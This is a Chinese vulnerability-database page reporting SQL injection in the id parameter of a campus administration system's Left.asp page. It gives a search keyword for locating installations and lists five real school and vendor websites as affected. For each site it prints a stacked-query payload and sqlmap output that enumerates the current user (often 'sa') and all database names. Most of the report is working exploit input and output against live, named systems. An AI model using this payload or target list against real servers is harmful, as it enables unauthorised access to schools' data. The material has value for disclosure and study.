|某通用型校园校务系统SQL注入之二 - VULHUB开源网络安全威胁库

某通用型校园校务系统SQL注入之二

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： boom！！！ ### 详细说明：厂商：南京苏亚星资讯科技开发有限公司漏洞位于：/SM2005/jiaoshi/InfoSet/Left.asp?id= id参数没有过滤，导致注射。直接访问http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ 有个越权报错，查看源代码可以拼接成注入链接 [<img src="https://images.seebug.org/upload/201411/13091108f5b6000ea1fc1723fd4b7b85fbd630e9.png" alt="111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/13091108f5b6000ea1fc1723fd4b7b85fbd630e9.png) [<img src="https://images.seebug.org/upload/201411/13091145db1b472004905f0032f5d943818830b3.png" alt="222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/13091145db1b472004905f0032f5d943818830b3.png) 百度关键字:/SM2005 列举5个案例证明通用性： http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [09:14:20] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008 [09:14:20] [INFO] fetching current user [09:14:20] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [09:14:20] [INFO] resumed: ?aA current user: '?aA' [09:14:20] [INFO] fetching current database [09:14:20] [INFO] resumed: yy200?a} current database: 'yy200?a}' [09:14:20] [INFO] fetching database names [09:14:20] [INFO] fetching number of databases [09:14:20] [INFO] resumed: 14 [09:14:20] [INFO] resumed: aaa [09:14:20] [INFO] resumed: zupit\x7fr5 [09:14:20] [INFO] resumed: \x7faster [09:14:20] [INFO] resumed: Merak [09:14:20] [INFO] resumed: model [09:14:20] [INFO] resumed: m?db [09:14:20] [INFO] resumed: North?in?b [09:14:20] [INFO] resumed: pubs [09:14:20] [INFO] resumed: S?20g? [09:14:20] [INFO] resumed: ? http://www.zjnksyzx.com:8801/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [09:13:33] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [09:13:33] [INFO] fetching current user [09:13:34] [INFO] resumed: saA\x11 current user: 'saA' [09:13:34] [INFO] fetching current database [09:13:34] [INFO] resumed: qM2005 current database: 'qM2005' [09:13:34] [INFO] fetching database names [09:13:34] [INFO] fetching number of databases [09:13:34] [INFO] resumed: 13 [09:13:34] [INFO] resumed: qupiter5\x11 [09:13:34] [INFO] resumed: maste}\x7f [09:13:34] [INFO] resumed: Merak [09:13:34] [INFO] resumed: model [09:13:34] [INFO] resumed: msdb [09:13:34] [INFO] resumed: Northwiyd [09:13:34] [INFO] resumed: p}bs [09:13:34] [INFO] resumed: SMa005 [09:13:34] [INFO] resumed: SRP2003 [09:13:34] [INFO] resumed: tempdb [09:13:34] [INFO] resumed: TempJupiterSa [09:13:34] [INFO] resumed: Vod2005 [09:13:34] [INFO] resumed: ws2004 available databases [13]: [*] [maste}] [*] [p}bs] [*] [qupiter5] [*] Merak [*] model [*] msdb [*] Northwiyd [*] SMa005 [*] SRP2003 [*] tempdb [*] TempJupiterSa [*] Vod2005 [*] ws2004 [09:13:34] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [09:13:34] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com' http://www.lcxyz.com:21245/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [18:06:43] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2008 [18:06:43] [INFO] fetching current user [18:06:43] [INFO] resumed: sa current user: 'sa' [18:06:43] [INFO] fetching current database [18:06:43] [INFO] resumed: SM2005 current database: 'SM2005' [18:06:43] [INFO] fetching database names [18:06:43] [INFO] fetching number of databases [18:06:43] [INFO] resumed: 13 [18:06:43] [INFO] resumed: Jupiter5 [18:06:43] [INFO] resumed: master [18:06:43] [INFO] resumed: Merak\x03 [18:06:43] [INFO] resumed: mode}q [18:06:43] [INFO] resumed: msdb [18:06:43] [INFO] resumed: ReportServe\x7fq [18:06:43] [INFO] resumed: ReportServerTempDB [18:06:43] [INFO] resumed: SM2005 [18:06:43] [INFO] resumed: SRP2003 [18:06:43] [INFO] resumed: tempdb [18:06:43] [INFO] resumed: vc?003 [18:06:43] [INFO] resumed: V}d2005 [18:06:43] [INFO] resumed: ws2004 available databases [13]: [*] [Merak] [*] [mode}q] [*] [ReportServeq] [*] [vc?003] [*] [V}d2005] [*] Jupiter5 [*] master [*] msdb [*] ReportServerTempDB [*] SM2005 [*] SRP2003 [*] tempdb [*] ws2004 [18:06:43] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [18:06:43] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com' http://www.suyaxing.com:81/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [09:16:55] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008 [09:16:55] [INFO] fetching current user [09:16:55] [INFO] resumed: sa current user: 'sa' [09:16:55] [INFO] fetching current database [09:16:55] [INFO] resumed: SM2005 current database: 'SM2005' [09:16:55] [INFO] fetching database names [09:16:55] [INFO] fetching number of databases [09:16:55] [INFO] resumed: 23 [09:16:55] [INFO] resumed: Jupiter5 [09:16:55] [INFO] resumed: master [09:16:55] [INFO] resumed: yerak [09:16:55] [INFO] resumed: model [09:16:55] [INFO] resumed: msdb [09:16:55] [INFO] resumed: Northwind [09:16:55] [INFO] resumed: pubs [09:16:55] [INFO] resumed: Sco_CRM [09:16:55] [INFO] resumed: ScoyCSM [09:16:55] [INFO] resumed: Sco_Document [09:16:55] [INFO] resumed: Sco_Financial [09:16:55] [INFO] resumed: Sco_Inve\x7ftory [09:16:55] [INFO] resumed: Sco_Personnel [09:16:55] [INFO] resumed: Sco_Platform [09:16:55] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [09:16:55] [INFO] resumed: Sco_Por?al [09:16:55] [INFO] resumed: SM2005 [09:16:55] [INFO] resumed: SRP2003 [09:16:55] [INFO] resumed: tempdb [09:16:55] [INFO] resumed: TempJupiterSa [09:16:55] [INFO] resumed: test [09:16:55] [INFO] resumed: vc2003 [09:16:55] [INFO] resumed: web [09:16:55] [INFO] resumed: ws2004 available databases [23]: [*] [Sco_Invetory] [*] [Sco_Por?al] [*] Jupiter5 [*] master [*] model [*] msdb [*] Northwind [*] pubs [*] Sco_CRM [*] Sco_Document [*] Sco_Financial [*] Sco_Personnel [*] Sco_Platform [*] ScoyCSM [*] SM2005 [*] SRP2003 [*] tempdb [*] TempJupiterSa [*] test [*] vc2003 [*] web [*] ws2004 [*] yerak [09:16:55] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com' http://www.hwsyxx.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [09:17:26] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008 [09:17:26] [INFO] fetching current user [09:17:26] [INFO] resumed: sa current user: 'sa' [09:17:26] [INFO] fetching current database [09:17:26] [INFO] resumed: SM2005 current database: 'SM2005' [09:17:26] [INFO] fetching database names [09:17:26] [INFO] fetching number of databases [09:17:26] [INFO] resumed: 13 [09:17:26] [INFO] resumed: Ju\x7fiter5 [09:17:26] [INFO] resumed: master [09:17:26] [INFO] resumed: Merak [09:17:26] [INFO] resumed: model [09:17:26] [INFO] resumed: msdb [09:17:26] [INFO] resumed: Northwind [09:17:26] [INFO] resumed: pubs [09:17:26] [INFO] resumed: SM2005 [09:17:26] [INFO] resumed: SRP2a03 [09:17:26] [INFO] resumed: tempdb [09:17:26] [INFO] resumed: vc2003 [09:17:26] [INFO] resumed: Vod2005 [09:17:26] [INFO] resumed: ws2004 available databases [13]: [*] [Juiter5] [*] master [*] Merak [*] model [*] msdb [*] Northwind [*] pubs [*] SM2005 [*] SRP2a03 [*] tempdb [*] vc2003 [*] Vod2005 [*] ws2004 [09:17:26] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [09:17:26] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com' ### 漏洞证明：已经证明

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™